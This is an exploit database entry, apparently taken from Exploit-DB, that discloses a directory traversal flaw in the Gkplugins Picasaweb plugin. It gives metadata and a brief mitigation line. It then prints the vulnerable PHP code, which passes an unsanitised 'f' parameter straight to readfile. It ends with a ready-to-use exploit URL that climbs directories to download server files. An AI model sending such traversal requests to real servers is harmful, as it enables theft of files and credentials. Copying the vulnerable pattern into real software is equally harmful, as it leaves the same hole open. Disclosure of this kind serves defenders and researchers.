Gkplugins Picasaweb Download File

vendor:

Gkplugins Picasaweb

by:

TMT [VNhgroup]

8.8

CVSS

HIGH

Directory Traversal

CWE

Product Name: Gkplugins Picasaweb

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2015

Gkplugins Picasaweb Download File

The vulnerability exists due to insufficient validation of user-supplied input in the 'f' and 'l' parameters of '/plugins/gkplugins_picasaweb/plugins/plugins_player.php' script. A remote attacker can download arbitrary files from the vulnerable server by sending a specially crafted HTTP request.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

# Exploit Title: Gkplugins Picasaweb Download File
# Date : 2015-08-13
# Exploit Author : TMT [VNhgroup]
# Vendor Homepage: https://gkplugins.com/
# Tested on: Windows 7

File
------------------------
$fileout = $_GET['f']; <--  can you download file
$filelength = $_GET['l'];
$filestream = $_GET['start'];
if($fileout!=""){
	$fileout = urldecode($fileout);
	$filelength = urldecode($filelength);
	if($filestream!=""){
		$filelength -= $filestream;
		$filestream = "?start=".$filestream;
	}
	header('Content-Type: application/octet-stream');
	header('Content-Length: ' . $filelength);
	readfile($fileout.$filestream);
}else{
	$text = get_curl($link); 
	echo $text;
}

------------------------------
Exploit Code:
site.com/plugins/gkplugins_picasaweb/plugins/plugins_player.php?f=../../../index.php